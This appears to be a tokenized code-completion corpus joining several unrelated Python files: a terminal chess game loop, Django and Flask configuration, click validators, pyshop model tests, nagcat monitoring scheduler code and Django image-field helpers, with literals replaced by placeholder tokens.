"<STR_LIT>" + move . notation ) <EOL> board . makeMove ( move ) <EOL> def printPointAdvantage ( board ) : <EOL> print ( "<STR_LIT>" + <EOL> str ( board . getPointAdvantageOfSide ( board . currentSide ) ) ) <EOL> def undoLastTwoMoves ( board ) : <EOL> if len ( board . history ) >= <NUM_LIT:2> : <EOL> board . undoLastMove ( ) <EOL> board . undoLastMove ( ) <EOL> def startGame ( board , playerSide , ai ) : <EOL> parser = InputParser ( board , playerSide ) <EOL> while True : <EOL> print ( board ) <EOL> print ( ) <EOL> if board . isCheckmate ( ) : <EOL> if board . currentSide == playerSide : <EOL> print ( "<STR_LIT>" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> return <EOL> if board . isStalemate ( ) : <EOL> if board . currentSide == playerSide : <EOL> print ( "<STR_LIT>" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> return <EOL> if board . currentSide == playerSide : <EOL> printPointAdvantage ( board ) <EOL> move = None <EOL> command = input ( "<STR_LIT>" <EOL> "<STR_LIT>" ) . lower ( ) <EOL> if command == '<STR_LIT:u>' : <EOL> undoLastTwoMoves ( board ) <EOL> continue <EOL> elif command == '<STR_LIT:?>' : <EOL> printCommandOptions ( ) <EOL> continue <EOL> elif command == '<STR_LIT:l>' : <EOL> printAllLegalMoves ( board , parser ) <EOL> continue <EOL> elif command == '<STR_LIT:r>' : <EOL> move = getRandomMove ( board , parser ) <EOL> elif command == '<STR_LIT>' : <EOL> return <EOL> else : <EOL> move = parser . moveForShortNotation ( command ) <EOL> if move : <EOL> makeMove ( move , board ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> move = ai . getBestMove ( ) <EOL> move . notation = parser . notationForMove ( move ) <EOL> makeMove ( move , board ) <EOL> def main ( ) : <EOL> board = Board ( ) <EOL> playerSide = askForPlayerSide ( ) <EOL> print ( ) <EOL> aiDepth = askForDepthOfAI ( ) <EOL> opponentAI = AI ( board , not playerSide , aiDepth ) <EOL> startGame ( board , playerSide , opponentAI ) </s>
<s> from django . conf import settings <EOL> ANCESTOR_PHRASE = getattr ( settings , '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> import click <EOL> from . history import clone <EOL> from . import config <EOL> def validate_remote ( ctx , param , value ) : <EOL> if value : <EOL> try : <EOL> remote , branch = value . split ( '<STR_LIT:/>' ) <EOL> return ( remote , branch ) <EOL> except ValueError : <EOL> raise click . BadParameter ( '<STR_LIT>' ) <EOL> def validate_cols ( ctx , param , value ) : <EOL> if value : <EOL> try : <EOL> validated = { c : index for index , c in enumerate ( value . split ( '<STR_LIT:U+002C>' ) ) if c } <EOL> for col in ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT:password>' ) : <EOL> assert col in validated <EOL> return validated <EOL> except ( AttributeError , ValueError ) : <EOL> raise click . BadParameter ( '<STR_LIT>' ) <EOL> except AssertionError as e : <EOL> raise click . BadParameter ( '<STR_LIT>' . format ( e ) ) <EOL> def validate_config ( ctx , param , value ) : <EOL> overrides = { k : v for k , v in ctx . params . items ( ) if v } <EOL> configuration = { } <EOL> configuration . update ( config . DEFAULT ) <EOL> configuration . update ( config . read ( config . HOMEDIR , '<STR_LIT>' ) ) <EOL> configuration . update ( config . read ( configuration [ '<STR_LIT:path>' ] ) ) <EOL> if value : <EOL> configuration . update ( config . read ( value ) ) <EOL> configuration . update ( overrides ) <EOL> if config . is_repo_url ( configuration [ '<STR_LIT:path>' ] ) is True : <EOL> temporary_path = clone ( configuration [ '<STR_LIT:path>' ] , depth = "<STR_LIT:1>" ) <EOL> configuration . update ( config . read ( temporary_path ) ) <EOL> configuration [ '<STR_LIT:path>' ] = temporary_path <EOL> configuration = config . setup_crypt ( configuration ) <EOL> return configuration </s>
<s> from . case import ModelTestCase <EOL> from . import setUpModule , tearDownModule <EOL> class GroupTestCase ( ModelTestCase ) : <EOL> def test_by_name ( self ) : <EOL> from pyshop . models import Group <EOL> grp = Group . by_name ( self . session , u'<STR_LIT>' ) <EOL> self . assertIsInstance ( grp , Group ) <EOL> self . assertEqual ( grp . name , u'<STR_LIT>' ) <EOL> class UserTestCase ( ModelTestCase ) : <EOL> def test_by_login_ok_mirrored ( self ) : <EOL> from pyshop . models import User <EOL> user = User . by_login ( self . session , u'<STR_LIT>' , local = False ) <EOL> self . assertIsInstance ( user , User ) <EOL> self . assertEqual ( user . login , u'<STR_LIT>' ) <EOL> def test_by_login_ko_mirrored ( self ) : <EOL> from pyshop . models import User <EOL> user = User . by_login ( self . session , u'<STR_LIT>' ) <EOL> self . assertEqual ( user , None ) <EOL> def test_by_login_ok_local ( self ) : <EOL> from pyshop . models import User <EOL> user = User . by_login ( self . session , u'<STR_LIT>' ) <EOL> self . assertIsInstance ( user , User ) <EOL> def test_by_credentials_ko_unexists ( self ) : <EOL> from pyshop . models import User <EOL> user = User . by_credentials ( self . session , u'<STR_LIT>' , u"<STR_LIT>" ) <EOL> self . assertEqual ( user , None ) <EOL> def test_by_credentials_ko_mirrored ( self ) : <EOL> from pyshop . models import User <EOL> user = User . by_credentials ( self . session , u'<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( user , None ) <EOL> def test_by_credentials_ko_password ( self ) : <EOL> from pyshop . models import User <EOL> user = User . by_credentials ( self . session , u'<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertIsNone ( user ) <EOL> def test_by_credentials_ok ( self ) : <EOL> from pyshop . models import User <EOL> user = User . by_credentials ( self . session , u'<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertIsInstance ( user , User ) <EOL> self . assertEqual ( user . login , u'<STR_LIT>' ) <EOL> self . assertEqual ( user . name , u'<STR_LIT>' ) <EOL> def test_hash_password ( self ) : <EOL> from pyshop . models import User <EOL> u = User ( login = u'<STR_LIT>' , password = u'<STR_LIT>' ) <EOL> self . assertNotEqual ( u . password , u'<STR_LIT>' , '<STR_LIT>' ) <EOL> class ClassifierTestCase ( ModelTestCase ) : <EOL> def test_by_name ( self ) : <EOL> from pyshop . models import Classifier <EOL> clsfier = Classifier . by_name ( self . session , <EOL> u'<STR_LIT>' ) <EOL> self . assertIsInstance ( clsfier , Classifier ) <EOL> self . assertEqual ( clsfier . category , u'<STR_LIT>' ) <EOL> self . assertEqual ( clsfier . name , u'<STR_LIT>' ) <EOL> parent = Classifier . by_name ( self . session , u'<STR_LIT>' ) <EOL> self . assertEqual ( clsfier . parent_id , parent . id ) <EOL> self . assertEqual ( sorted ( [ c . shortname for c in parent . childs ] ) , <EOL> [ u'<STR_LIT>' , u'<STR_LIT>' ] ) <EOL> class PackageTestCase ( ModelTestCase ) : <EOL> def test_versions ( self ) : <EOL> from pyshop . models import Package <EOL> pkg = Package . by_name ( self . session , u'<STR_LIT>' ) <EOL> self . assertIsInstance ( pkg , Package ) <EOL> self . assertEqual ( pkg . id , <NUM_LIT:1> ) <EOL> self . assertEqual ( pkg . versions , [ u'<STR_LIT>' , u'<STR_LIT>' ] ) <EOL> def test_by_name ( self ) : <EOL> from pyshop . models import Package <EOL> pkg = Package . by_name ( self . session , u'<STR_LIT>' ) <EOL> self . assertIsInstance ( pkg , Package ) <EOL> self . assertEqual ( pkg . id , <NUM_LIT:1> ) <EOL> self . assertEqual ( pkg . name , u'<STR_LIT>' ) <EOL> def test_by_owner ( self ) : <EOL> from pyshop . models import Package <EOL> pkges = Package . by_owner ( self . session , u'<STR_LIT>' ) <EOL> self . assertIsInstance ( pkges , list ) <EOL> pkges = [ pkg . name for pkg in pkges ] <EOL> self . assertEqual ( pkges , [ u'<STR_LIT>' , u'<STR_LIT>' ] ) <EOL> def test_by_maintainer ( self ) : <EOL> from pyshop . models import Package <EOL> pkges = Package . by_maintainer ( self . session , u'<STR_LIT>' ) <EOL> self . assertIsInstance ( pkges , list ) <EOL> pkges = [ pkg . name for pkg in pkges ] <EOL> self . assertEqual ( pkges , [ u'<STR_LIT>' ] ) <EOL> def test_get_locals ( self ) : <EOL> from pyshop . models import Package <EOL> pkges = Package . get_locals ( self . session ) <EOL> self . assertIsInstance ( pkges , list ) <EOL> pkges = [ pkg . name for pkg in pkges ] <EOL> self . assertEqual ( pkges , [ u'<STR_LIT>' ] ) <EOL> def test_get_mirrored ( self ) : <EOL> from pyshop . models import Package <EOL> pkges = Package . get_mirrored ( self . session ) <EOL> self . assertIsInstance ( pkges , list ) <EOL> pkges = [ pkg . name for pkg in pkges ] <EOL> self . assertEqual ( pkges , [ u'<STR_LIT>' , u'<STR_LIT>' ] ) <EOL> class ReleaseTestCase ( ModelTestCase ) : <EOL> def test_by_version ( self ) : <EOL> from pyshop . models import Release <EOL> release = Release . by_version ( self . session , u'<STR_LIT>' , u'<STR_LIT:1.0>' ) <EOL> self . assertIsInstance ( release , Release ) <EOL> self . assertEqual ( release . package . name , u'<STR_LIT>' ) <EOL> self . assertEqual ( release . version , u'<STR_LIT:1.0>' ) <EOL> def test_by_classifiers ( self ) : <EOL> from pyshop . models import Release <EOL> releases = Release . by_classifiers ( self . session , <EOL> [ u'<STR_LIT>' ] ) <EOL> self . assertIsInstance ( releases , list ) <EOL> releases = [ ( r . package . name , r . version ) for r in releases ] <EOL> self . assertEqual ( releases , [ ( u'<STR_LIT>' , u'<STR_LIT>' ) ] ) <EOL> def test_search_by_author ( self ) : <EOL> from pyshop . models import Release <EOL> releases = Release . search ( self . session , { '<STR_LIT>' : '<STR_LIT>' } , '<STR_LIT>' ) <EOL> self . assertIsInstance ( releases , list ) <EOL> releases = [ ( r . package . name , r . version ) for r in releases ] <EOL> self . assertEqual ( releases , [ ( u'<STR_LIT>' , u'<STR_LIT>' ) ] ) <EOL> def test_sorted_releases ( self ) : <EOL> from pyshop . models import Package <EOL> pkg = Package . by_name ( self . session , u'<STR_LIT>' ) <EOL> self . assertEqual ( [ release . version for release in pkg . sorted_releases ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> class ReleaseFileTestCase ( ModelTestCase ) : <EOL> def test_by_release ( self ) : <EOL> from pyshop . models import ReleaseFile <EOL> files = ReleaseFile . by_release ( self . session , u'<STR_LIT>' , <EOL> u'<STR_LIT:1.0>' ) <EOL> self . assertIsInstance ( files , list ) <EOL> files = [ f . filename for f in files ] <EOL> self . assertEqual ( files , [ u'<STR_LIT>' ] ) <EOL> def by_filename ( self ) : <EOL> from pyshop . models import ReleaseFile <EOL> file = ReleaseFile . by_filename ( self . session , u'<STR_LIT>' , <EOL> u'<STR_LIT>' ) <EOL> self . assertIsInstance ( file , ReleaseFile ) <EOL> self . assertEqual ( file . release . package . name , u'<STR_LIT>' ) <EOL> self . assertEqual ( file . release . version , u'<STR_LIT>' ) <EOL> self . assertEqual ( file . package_type , u'<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> class BaseConf ( object ) : <EOL> """<STR_LIT>""" <EOL> DEBUG = True <EOL> SECRET_KEY = None <EOL> SERVER_NAME = None <EOL> ASSETS_DEBUG = False <EOL> FLASK_ASSETS_USE_S3 = False <EOL> FLASK_ASSETS_USE_CDN = False <EOL> MAIL_SERVER = '<STR_LIT:localhost>' <EOL> MAIL_PORT = <NUM_LIT> <EOL> MAIL_USE_TLS = False <EOL> MAIL_USE_SSL = False <EOL> MAIL_DEBUG = False <EOL> MAIL_USERNAME = None <EOL> MAIL_PASSWORD = None <EOL> MAIL_DEFAULT_SENDER = None <EOL> MAIL_MAX_EMAILS = None <EOL> MAIL_ASCII_ATTACHMENTS = False <EOL> SQLALCHEMY_DATABASE_URI = None <EOL> class Prod ( BaseConf ) : <EOL> """<STR_LIT>""" <EOL> DEBUG = False <EOL> class Dev ( BaseConf ) : <EOL> """<STR_LIT>""" <EOL> DEBUG = True <EOL> SECRET_KEY = "<STR_LIT>" </s>
<s> import time <EOL> try : <EOL> import MySQLdb <EOL> except ImportError : <EOL> MySQLdb = None <EOL> from nagcat import log , merlintest , nagios <EOL> def available ( ) : <EOL> """<STR_LIT>""" <EOL> return MySQLdb is not None <EOL> class NagcatMerlin ( nagios . NagcatNagios ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , config , nagios_cfg , merlin_db_info = { } , ** kwargs ) : <EOL> assert available ( ) <EOL> nagios . NagcatNagios . __init__ ( self , config , nagios_cfg , ** kwargs ) <EOL> self . _test_index = <NUM_LIT:0> <EOL> self . _merlin_db_info = merlin_db_info <EOL> self . _peer_id = None <EOL> self . _peer_id_timestamp = None <EOL> self . _num_peers = None <EOL> self . _update_peer_id ( ) <EOL> def new_test ( self , config ) : <EOL> new = merlintest . MerlinTest ( self , config , self . _test_index ) <EOL> self . _test_index += <NUM_LIT:1> <EOL> self . register ( new ) <EOL> if self . trend : <EOL> self . trend . setup_test_trending ( new , config ) <EOL> return new <EOL> def _set_peer_id_and_timestamp ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> db = MySQLdb . connect ( <EOL> user = self . _merlin_db_info [ '<STR_LIT>' ] , <EOL> host = self . _merlin_db_info [ '<STR_LIT>' ] , <EOL> passwd = self . _merlin_db_info [ '<STR_LIT>' ] , <EOL> db = self . _merlin_db_info [ '<STR_LIT>' ] ) <EOL> curs = db . cursor ( ) <EOL> num_rows = curs . execute ( <EOL> """<STR_LIT>""" ) <EOL> self . _num_peers = num_rows <EOL> log . debug ( "<STR_LIT>" , self . _num_peers ) <EOL> for i in range ( num_rows ) : <EOL> row = curs . fetchone ( ) <EOL> if row [ <NUM_LIT:0> ] == "<STR_LIT:localhost>" : <EOL> self . _peer_id = row [ <NUM_LIT:5> ] <EOL> self . _peer_id_timestamp = time . time ( ) <EOL> log . debug ( ( "<STR_LIT>" , <EOL> str ( self . _peer_id ) ) + <EOL> ( "<STR_LIT>" , <EOL> self . _peer_id_timestamp ) ) <EOL> except MySQLdb . Error , e : <EOL> log . error ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) ) <EOL> def _update_peer_id ( self ) : <EOL> log . debug ( "<STR_LIT>" , <EOL> self . _merlin_db_info ) <EOL> if self . _peer_id and self . _peer_id_timestamp : <EOL> if time . time ( ) - self . _peer_id_timestamp >= <NUM_LIT> : <EOL> self . _set_peer_id_and_timestamp ( ) <EOL> else : <EOL> return <EOL> else : <EOL> if self . _merlin_db_info : <EOL> self . _set_peer_id_and_timestamp ( ) <EOL> def get_peer_id_num_peers ( self ) : <EOL> self . _update_peer_id ( ) <EOL> return self . _peer_id , self . _num_peers </s>
<s> """<STR_LIT>""" <EOL> import time <EOL> import random <EOL> from collections import defaultdict , deque <EOL> from itertools import chain <EOL> from twisted . internet import defer , reactor , task <EOL> try : <EOL> from lxml import etree <EOL> except ImportError : <EOL> etree = None <EOL> from nagcat import log , monitor_api , query , test , trend <EOL> from nagcat . runnable import Runnable , RunnableGroup <EOL> class SchedulerPage ( monitor_api . XMLPage ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , scheduler ) : <EOL> super ( SchedulerPage , self ) . __init__ ( ) <EOL> self . scheduler = scheduler <EOL> def xml ( self , request ) : <EOL> sch = etree . Element ( "<STR_LIT>" , version = "<STR_LIT:1.0>" ) <EOL> data = self . scheduler . stats ( ) <EOL> lat = etree . SubElement ( sch , "<STR_LIT>" , <EOL> period = str ( data [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) ) <EOL> etree . SubElement ( lat , "<STR_LIT>" ) . text = "<STR_LIT>" % data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> etree . SubElement ( lat , "<STR_LIT>" ) . text = "<STR_LIT>" % data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> etree . SubElement ( lat , "<STR_LIT>" ) . text = "<STR_LIT>" % data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> tasks = etree . SubElement ( sch , '<STR_LIT>' , <EOL> count = str ( data [ '<STR_LIT>' ] [ '<STR_LIT:count>' ] ) ) <EOL> for task_type in data [ '<STR_LIT>' ] : <EOL> if task_type == "<STR_LIT:count>" : <EOL> continue <EOL> task_node = etree . SubElement ( tasks , task_type , <EOL> count = str ( data [ '<STR_LIT>' ] [ task_type ] [ '<STR_LIT:count>' ] ) ) <EOL> for sub_type in data [ '<STR_LIT>' ] [ task_type ] : <EOL> if sub_type == "<STR_LIT:count>" : <EOL> continue <EOL> etree . SubElement ( task_node , task_type , type = sub_type , <EOL> count = str ( data [ '<STR_LIT>' ] [ task_type ] [ sub_type ] [ '<STR_LIT:count>' ] ) ) <EOL> return sch <EOL> class Scheduler ( object ) : <EOL> """<STR_LIT>""" <EOL> trend = None <EOL> monitor = None <EOL> def __init__ ( self , <EOL> config = None , <EOL> rradir = None , <EOL> rrdcache = None , <EOL> monitor_port = None , <EOL> default_timeout = <NUM_LIT:15> , <EOL> ** kwargs ) : <EOL> self . _registered = set ( ) <EOL> self . _group_index = defaultdict ( set ) <EOL> self . _startup = True <EOL> self . _shutdown = None <EOL> self . _latency = deque ( [ <NUM_LIT:0> ] , <NUM_LIT> ) <EOL> self . _latency_call = None <EOL> self . _task_stats = { <EOL> '<STR_LIT:count>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : { '<STR_LIT:count>' : <NUM_LIT:0> } , <EOL> '<STR_LIT>' : { '<STR_LIT:count>' : <NUM_LIT:0> } , <EOL> '<STR_LIT>' : { '<STR_LIT:count>' : <NUM_LIT:0> } , <EOL> } <EOL> self . default_timeout = default_timeout <EOL> if monitor_port : <EOL> self . _monitor_port = monitor_port <EOL> self . monitor = monitor_api . MonitorSite ( ) <EOL> page = SchedulerPage ( self ) <EOL> self . monitor . includeChild ( "<STR_LIT>" , page ) <EOL> if rradir : <EOL> self . trend = trend . TrendMaster ( rradir , rrdcache ) <EOL> self . query = query . QueryManager ( self ) <EOL> self . build_tests ( config , ** kwargs ) <EOL> def build_tests ( self , config , ** kwargs ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> def new_test ( self , config ) : <EOL> new = test . Test ( self , config ) <EOL> self . register ( new ) <EOL> if self . trend : <EOL> self . trend . setup_test_trending ( new , config ) <EOL> return new <EOL> def new_query ( self , config , qcls = None ) : <EOL> return self . query . new_query ( config , qcls ) <EOL> def register ( self , task ) : <EOL> """<STR_LIT>""" <EOL> assert self . _startup <EOL> assert task not in self . _group_index <EOL> assert isinstance ( task , Runnable ) <EOL> log . trace ( "<STR_LIT>" , task ) <EOL> task_deps = task . getAllDependencies ( ) <EOL> all_groups = chain . from_iterable ( self . _group_index [ d ] <EOL> for d in task_deps ) <EOL> groups = set ( g for g in all_groups if g . repeat == task . repeat ) <EOL> update_index = set ( task_deps ) <EOL> update_index . add ( task ) <EOL> if not groups : <EOL> group = RunnableGroup ( [ task ] , task . repeat ) <EOL> self . _update_stats ( group ) <EOL> self . _registered . add ( group ) <EOL> log . trace ( "<STR_LIT>" , group ) <EOL> else : <EOL> group = groups . pop ( ) <EOL> group . addDependency ( task ) <EOL> log . trace ( "<STR_LIT>" , group ) <EOL> for extra_group in groups : <EOL> self . _update_stats ( extra_group , - <NUM_LIT:1> ) <EOL> self . _registered . remove ( extra_group ) <EOL> group . addDependencies ( extra_group ) <EOL> update_index . update ( extra_group . getAllDependencies ( ) ) <EOL> log . trace ( "<STR_LIT>" , extra_group ) <EOL> for runnable in update_index : <EOL> if not self . _group_index [ runnable ] : <EOL> self . _update_stats ( runnable ) <EOL> self . _group_index [ runnable ] . add ( group ) <EOL> self . _group_index [ runnable ] . difference_update ( groups ) <EOL> def stats ( self ) : <EOL> """<STR_LIT>""" <EOL> data = { '<STR_LIT>' : self . _task_stats } <EOL> data [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : max ( self . _latency ) , <EOL> '<STR_LIT>' : min ( self . _latency ) , <EOL> '<STR_LIT>' : sum ( self . _latency ) / len ( self . _latency ) , <EOL> } <EOL> return data <EOL> def _update_stats ( self , runnable , inc = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> self . _task_stats [ '<STR_LIT:count>' ] += inc <EOL> if runnable . type in self . _task_stats : <EOL> self . _task_stats [ runnable . type ] [ '<STR_LIT:count>' ] += inc <EOL> else : <EOL> self . _task_stats [ runnable . type ] = { '<STR_LIT:count>' : inc } <EOL> if runnable . name : <EOL> if runnable . name in self . _task_stats [ runnable . type ] : <EOL> self . _task_stats [ runnable . type ] [ runnable . name ] [ '<STR_LIT:count>' ] += inc <EOL> else : <EOL> self . _task_stats [ runnable . type ] [ runnable . name ] = { '<STR_LIT:count>' : inc } <EOL> def _log_stats ( self ) : <EOL> """<STR_LIT>""" <EOL> log . info ( "<STR_LIT>" , self . _task_stats [ '<STR_LIT:count>' ] ) <EOL> log . info ( "<STR_LIT>" , self . _task_stats [ '<STR_LIT>' ] [ '<STR_LIT:count>' ] ) <EOL> log . info ( "<STR_LIT>" , self . _task_stats [ '<STR_LIT>' ] [ '<STR_LIT:count>' ] ) <EOL> log . info ( "<STR_LIT>" , self . _task_stats [ '<STR_LIT>' ] [ '<STR_LIT:count>' ] ) <EOL> for query_type , query_info in self . _task_stats [ '<STR_LIT>' ] . iteritems ( ) : <EOL> if query_type == "<STR_LIT:count>" : <EOL> continue <EOL> log . info ( "<STR_LIT>" , query_type , query_info [ '<STR_LIT:count>' ] ) <EOL> def start ( self ) : <EOL> """<STR_LIT>""" <EOL> assert self . _startup and not self . _shutdown <EOL> self . _startup = False <EOL> self . _shutdown = deferred = defer . Deferred ( ) <EOL> del self . _group_index <EOL> if not self . _registered : <EOL> self . stop ( ) <EOL> return deferred <EOL> if self . monitor : <EOL> reactor . listenTCP ( self . _monitor_port , self . monitor ) <EOL> self . _log_stats ( ) <EOL> host_groups = { } <EOL> for runnable in self . _registered : <EOL> runnable . finalize ( ) <EOL> if runnable . host in host_groups : <EOL> host_groups [ runnable . host ] . append ( runnable ) <EOL> else : <EOL> host_groups [ runnable . host ] = [ runnable ] <EOL> for host_name , host_group in host_groups . iteritems ( ) : <EOL> log . debug ( "<STR_LIT>" , host_name ) <EOL> slot = <NUM_LIT> / len ( host_group ) <EOL> assert slot <EOL> delay = random . random ( ) * slot <EOL> for runnable in host_group : <EOL> self . schedule ( runnable , delay ) <EOL> delay += slot <EOL> self . _latency_call = reactor . callLater ( <NUM_LIT:1.0> , self . latency , time . time ( ) ) <EOL> log . info ( "<STR_LIT>" ) <EOL> return deferred <EOL> def schedule ( self , runnable , delay = None ) : <EOL> """<STR_LIT>""" <EOL> if delay is None : <EOL> delay = runnable . repeat <EOL> if not delay : <EOL> log . error ( "<STR_LIT>" , runnable ) <EOL> else : <EOL> log . debug ( "<STR_LIT>" , runnable , delay ) <EOL> deferred = task . deferLater ( reactor , delay , runnable . start ) <EOL> deferred . addBoth ( lambda x : self . schedule ( runnable ) ) <EOL> def stop ( self ) : <EOL> """<STR_LIT>""" <EOL> assert self . _shutdown <EOL> if self . _latency_call : <EOL> self . _latency_call . cancel ( ) <EOL> self . _latency_call = None <EOL> deferred = self . _shutdown <EOL> self . _shutdown = None <EOL> deferred . callback ( None ) <EOL> def latency ( self , last ) : <EOL> now = time . time ( ) <EOL> self . _latency_call = reactor . callLater ( <NUM_LIT:1.0> , self . latency , now ) <EOL> latency = now - last - <NUM_LIT:1.0> <EOL> self . _latency . append ( latency ) <EOL> if latency > <NUM_LIT> : <EOL> log . error ( "<STR_LIT>" % latency ) <EOL> elif latency > <NUM_LIT> : <EOL> log . warn ( "<STR_LIT>" % latency ) </s>
<s> from twisted . trial import unittest <EOL> from nagcat import simple <EOL> from coil . struct import Struct <EOL> class BaseTestCase ( unittest . TestCase ) : <EOL> def testBasic ( self ) : <EOL> config = Struct ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : "<STR_LIT>" , <EOL> '<STR_LIT:data>' : "<STR_LIT>" , <EOL> } , <EOL> } , <EOL> } ) <EOL> b = simple . NagcatSimple ( config , test_name = "<STR_LIT>" ) <EOL> return b . start ( ) </s>
<s> from django . db import models <EOL> from railroad . viewhosts . views import slugify <EOL> class Service ( models . Model ) : <EOL> host = models . CharField ( max_length = <NUM_LIT:50> ) <EOL> service = models . CharField ( max_length = <NUM_LIT:50> ) <EOL> start = models . IntegerField ( ) <EOL> end = models . IntegerField ( ) <EOL> uniq = models . IntegerField ( ) <EOL> def __unicode__ ( self ) : <EOL> return slugify ( self . host + self . service ) <EOL> def __repr__ ( self ) : <EOL> return slugify ( '<STR_LIT>' + self . host + self . service + '<STR_LIT>' ) <EOL> class ConfiguratorPage ( models . Model ) : <EOL> link = models . CharField ( max_length = <NUM_LIT:20> ) <EOL> services = models . ManyToManyField ( Service ) <EOL> creation = models . DateTimeField ( '<STR_LIT>' ) <EOL> user = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> description = models . CharField ( max_length = <NUM_LIT:1000> , blank = True ) <EOL> def __unicode__ ( self ) : <EOL> return self . link <EOL> def save_services ( self , service_dict ) : <EOL> for s in service_dict : <EOL> if not s : <EOL> continue <EOL> host = s [ '<STR_LIT:host>' ] <EOL> service = s [ '<STR_LIT>' ] <EOL> if s . has_key ( '<STR_LIT:start>' ) : <EOL> start = s [ '<STR_LIT:start>' ] <EOL> else : <EOL> start = <NUM_LIT:0> <EOL> if s . has_key ( '<STR_LIT:end>' ) : <EOL> end = s [ '<STR_LIT:end>' ] <EOL> else : <EOL> end = <NUM_LIT:0> <EOL> if s . has_key ( '<STR_LIT>' ) : <EOL> uniq = s [ '<STR_LIT>' ] <EOL> else : <EOL> uniq = <NUM_LIT:0> <EOL> self . services . create ( host = host , service = service , <EOL> start = start , end = end , uniq = uniq ) <EOL> def load_services ( self ) : <EOL> service_list = [ ] <EOL> for s in self . services . all ( ) : <EOL> host = s . host <EOL> servicename = s . service <EOL> start = s . start <EOL> end = s . end <EOL> uniq = s . uniq <EOL> service = { <EOL> "<STR_LIT:host>" : host , <EOL> "<STR_LIT>" : servicename , <EOL> "<STR_LIT:start>" : start , <EOL> "<STR_LIT:end>" : end , <EOL> "<STR_LIT>" : uniq , <EOL> } <EOL> service_list . append ( service ) <EOL> return service_list <EOL> def num_services ( self ) : <EOL> return len ( self . load_services ( ) ) </s>
<s> from __future__ import with_statement , unicode_literals <EOL> from django . db import models <EOL> from django . db . models import Q <EOL> from django import forms <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from sorl . thumbnail import default <EOL> __all__ = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> class ImageField ( models . ImageField ) : <EOL> def delete_file ( self , instance , sender , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> file_ = getattr ( instance , self . attname ) <EOL> query = Q ( ** { self . name : file_ . name } ) & ~ Q ( pk = instance . pk ) <EOL> qs = sender . _default_manager . filter ( query ) <EOL> if ( file_ and file_ . name != self . default and not qs ) : <EOL> default . backend . delete ( file_ ) <EOL> elif file_ : <EOL> file_ . close ( ) <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : ImageFormField } <EOL> defaults . update ( kwargs ) <EOL> return super ( ImageField , self ) . formfield ( ** defaults ) <EOL> def save_form_data ( self , instance , data ) : <EOL> if data is not None : <EOL> setattr ( instance , self . name , data or '<STR_LIT>' ) <EOL> def south_field_triple ( self ) : <EOL> from south . modelsinspector import introspector <EOL> cls_name = '<STR_LIT>' % ( self . __class__ . __module__ , self . __class__ . __name__ ) <EOL> args , kwargs = introspector ( self ) <EOL> return ( cls_name , args , kwargs ) <EOL> class ImageFormField ( forms . FileField ) : <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> } <EOL> def to_python ( self , data ) : <EOL> """<STR_LIT>""" <EOL> f = super ( ImageFormField , self ) . to_python ( data ) <EOL> if f is None : <EOL> return None <EOL> if hasattr ( data , '<STR_LIT>' ) : <EOL> with open ( data . temporary_file_path ( ) , '<STR_LIT:rb>' ) as fp : <EOL> raw_data = fp . read ( ) <EOL> elif hasattr ( data , '<STR_LIT>' ) : <EOL> raw_data = data . read ( ) <EOL> else : <EOL> raw_data = data [ '<STR_LIT:content>' ] <EOL> if not default . engine . is_valid_image ( raw_data ) : <EOL> raise forms . ValidationError ( self . default_error_messages [ '<STR_LIT>' ] ) <EOL> if hasattr ( f , '<STR_LIT>' ) and callable ( f . seek ) : <EOL> f . seek ( <NUM_LIT:0> ) <EOL> return f </s>
<s> from __future__ import unicode_literals <EOL> import logging <EOL> from django . core . files . storage import FileSystemStorage <EOL> class MockLoggingHandler ( logging . Handler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . reset ( ) <EOL> super ( MockLoggingHandler , self ) . __init__ ( * args , ** kwargs ) <EOL> def emit ( self , record ) : <EOL> self . messages [ record . levelname . lower ( ) ] . append ( record . getMessage ( ) ) <EOL> def reset ( self ) : <EOL> self . messages = { '<STR_LIT>' : [ ] , '<STR_LIT:info>' : [ ] , '<STR_LIT>' : [ ] , '<STR_LIT:error>' : [ ] , '<STR_LIT>' : [ ] } <EOL> slog = logging . getLogger ( '<STR_LIT>' ) <EOL> class TestStorageMixin ( object ) : <EOL> def open ( self , name , * args , ** kwargs ) : <EOL> slog . debug ( '<STR_LIT>' % name ) <EOL> return super ( TestStorageMixin , self ) . open ( name , * args , ** kwargs ) <EOL> def save ( self , name , * args , ** kwargs ) : <EOL> slog . debug ( '<STR_LIT>' % name ) <EOL> return super ( TestStorageMixin , self ) . save ( name , * args , ** kwargs ) <EOL> def get_valid_name ( self , name , * args , ** kwargs ) : <EOL> slog . debug ( '<STR_LIT>' % name ) <EOL> return super ( TestStorageMixin , self ) 